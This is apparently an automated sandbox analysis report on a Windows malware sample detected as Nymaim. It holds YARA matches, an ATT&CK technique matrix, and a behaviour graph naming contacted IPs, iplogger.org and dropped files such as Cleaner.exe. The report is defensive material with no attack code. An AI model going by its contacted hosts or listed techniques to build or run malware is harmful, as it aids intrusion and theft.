                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Nymaim
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.20.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.26.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.24.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.22.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.28.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.18.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.32.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.30.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation                  		Path Interception12
                  Process Injection                  		11
                  Masquerading                  		OS Credential Dumping111
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium11
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                  Ingress Tool Transfer                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                  Virtualization/Sandbox Evasion                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                  Process Injection                  		NTDS1
                  Remote System Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer123
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Software Packing                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Timestomp                  		DCSync14
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 715158 Sample: file.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 88 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 4 other signatures 2->64 7 file.exe 29 2->7         started        process3 dnsIp4 52 208.67.104.97, 49693, 49698, 80 GRAYSON-COLLIN-COMMUNICATIONSUS United States 7->52 54 85.31.46.167, 49694, 80 CLOUDCOMPUTINGDE Germany 7->54 56 2 other IPs or domains 7->56 30 C:\Users\user\AppData\Local\...\Cleaner.exe, PE32 7->30 dropped 32 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 7->32 dropped 34 C:\Users\user\AppData\Local\...\dll[1], PE32 7->34 dropped 36 C:\Users\user\AppData\Local\...\soft[1], PE32 7->36 dropped 11 cmd.exe 1 7->11         started        13 WerFault.exe 9 7->13         started        16 WerFault.exe 9 7->16         started        18 9 other processes 7->18 file5 process6 file7 20 Cleaner.exe 17 2 11->20         started        24 conhost.exe 11->24         started        38 C:\ProgramData\Microsoft\...\Report.wer, Unicode 13->38 dropped 40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->40 dropped 42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->42 dropped 44 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->44 dropped 46 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->46 dropped 48 5 other malicious files 18->48 dropped 26 conhost.exe 18->26         started        28 taskkill.exe 18->28         started        process8 dnsIp9 50 iplogger.org 148.251.234.83, 443, 49701 HETZNER-ASDE Germany 20->50 66 Multi AV Scanner detection for dropped file 20->66 68 May check the online IP address of the machine 20->68 signatures10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]29%ReversingLabsWin32.Trojan.Lazy
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe29%ReversingLabsWin32.Trojan.Lazy

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.0.file.exe.400000.21.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.31.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.7.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.19.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.5.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.23.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.13.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.25.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.9.unpack100%AviraHEUR/AGEN.1250671Download File
